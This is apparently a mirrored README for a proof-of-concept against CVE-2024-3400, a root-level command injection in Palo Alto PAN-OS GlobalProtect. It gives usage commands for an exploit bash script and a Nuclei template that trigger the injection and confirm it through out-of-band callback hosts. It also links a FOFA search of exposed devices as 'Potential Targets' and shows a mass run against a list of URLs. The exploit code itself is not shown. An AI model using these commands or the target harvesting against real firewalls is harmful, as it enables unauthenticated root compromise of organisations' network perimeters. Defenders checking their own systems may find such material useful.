## https://sploitus.com/exploit?id=98A29BFD-6CE1-5632-8E61-2399612EA3DA
# CVE-2024-3400
![POC](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-POC-1.jpg)
![telemet](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-Nuclei-Template.jpg)
# Description
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
# CVE-2024-3400 Nuclei Template for Palo Alto PAN-OS Vulnerability
This repository contains a Nuclei Template for detecting Palo Alto PAN-OS instances vulnerable to CVE-2024-3400.
The template builds on the following published research:
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
## Vulnerabilities Detected
- **0 Byte File Creation**: The Bash script uses a curl request to check whether the vulnerability allows a 0-byte file to be created on the device.
- **OS Command Injection**: The Nuclei Template detects the OS command injection that follows from the arbitrary file creation.
## Usage
### Bash Script
Execute the following command to run the Bash script:
```sh
./CVE-2024-3400.sh http://target
# or
sh CVE-2024-3400.sh http://target
```
The script first checks whether the file is created (the request returns a 200 OK status). If that succeeds, it then verifies that the file exists (the request for the file returns a 403 Forbidden status).
### Nuclei Template - telemet.yaml
1. Start an Interact Server:
```sh
interactsh-client -v
```
2. Run the Nuclei Template:
```sh
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
```
3. Boom Boom Template! (get a callback subdomain from https://dig.pm)
```sh
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
```
## Potential Targets
A list of potential targets can be found [here](https://en.fofa.info/result?qbase64=YmFubmVyPSJHbG9iYWwgUHJvdGVjdCI%3D).
```sh
python fofax3r.py
```
## Author
- **Author**: 자전거, 自転車, 自行车